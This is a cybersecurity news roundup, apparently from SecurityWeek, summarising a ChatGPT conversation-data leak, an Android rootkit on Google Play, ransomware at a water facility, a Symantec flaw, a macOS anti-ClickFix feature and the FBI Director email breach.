A busy week in cybersecurity produced some stories that deserve attention beyond the headlines. Here's a roundup of notable incidents and developments that may have slipped under the radar.
ChatGPT Conversation Data Leak
OpenAI investigated a data leak involving ChatGPT conversation logs. Reports indicated that some users were able to access fragments of other users' conversation history through an edge case in the caching layer. OpenAI confirmed the incident, stating that the exposure window was limited, and that affected accounts were notified. The incident renewed questions about what data is retained at inference time and for how long — questions that enterprise customers are increasingly asking before deploying AI tools at scale.
Android Rootkit Discovered on Google Play
Security researchers identified a new Android rootkit that successfully passed Google Play's review process and infected an estimated 23 million devices before removal. The malware, dubbed NoVoice, presented as a utility application and used a multi-stage loading technique to delay the deployment of its malicious payload until after installation review windows. NoVoice granted itself elevated permissions to intercept calls and SMS messages, effectively functioning as a surveillance tool. Google has removed the app and pushed a Play Protect signature update; users who installed the affected application are advised to perform a factory reset or use Google's guided remediation tool.
Water Treatment Facility Hit by Ransomware
A municipal water treatment facility in Foster City, California, declared a local emergency after ransomware encrypted operational technology (OT) systems used to monitor water quality and distribution. While water service was not interrupted — manual operations were activated — the incident is notable as an example of ransomware reaching OT environments in critical infrastructure. The ransomware group has not been publicly identified. CISA issued a flash advisory reminding water utility operators to segment IT and OT networks and maintain offline backups of configuration data.
Symantec Vulnerability Disclosed
A vulnerability in a Symantec security product was publicly disclosed this week. Details remain limited pending a coordinated disclosure window, but the flaw affects endpoint protection components. Broadcom (Symantec's owner) has acknowledged the report and is expected to release patches in the coming days. Administrators running affected versions should monitor Broadcom's security advisory portal for updates.
macOS Gets Anti-ClickFix Mechanism
Apple quietly shipped an update to macOS adding a native mechanism to detect and block ClickFix-style social engineering attacks — the technique where users are tricked into opening Terminal or running PowerShell commands by fake CAPTCHA or error dialogs. The anti-ClickFix protection raises a system warning when clipboard content matching shell command patterns is about to be pasted into a terminal. The feature was first spotted in macOS 15.4's release notes and builds on existing XProtect telemetry.
FBI Director Hack Classified as Major Incident
The US government has formally classified the breach of FBI Director Kash Patel's personal email inbox as a major cyber incident under FISMA definitions. The hack, attributed to Iranian threat actors, exposed communications from a non-government account that was reportedly used for some work-related correspondence. The classification triggers formal congressional notification requirements and a government-wide security review. The State Department has re-issued its $10 million reward for information leading to the identification or location of the responsible actors.
Quick Hits
- Symantec SEP patching guidance expected this week — watch Broadcom's advisory feed
- Foster City water facility — the first confirmed OT ransomware hit of Q2 2026
- NoVoice Android malware — Google Play install counts suggest 23M+ exposures before removal
- macOS anti-ClickFix — enabled by default in macOS 15.4, no user action required
- FBI director hack — major incident classification puts it in the same tier as SolarWinds and Exchange
Source: SecurityWeek — In Other News: ChatGPT Data Leak, Android Rootkit, Water Facility Hit by Ransomware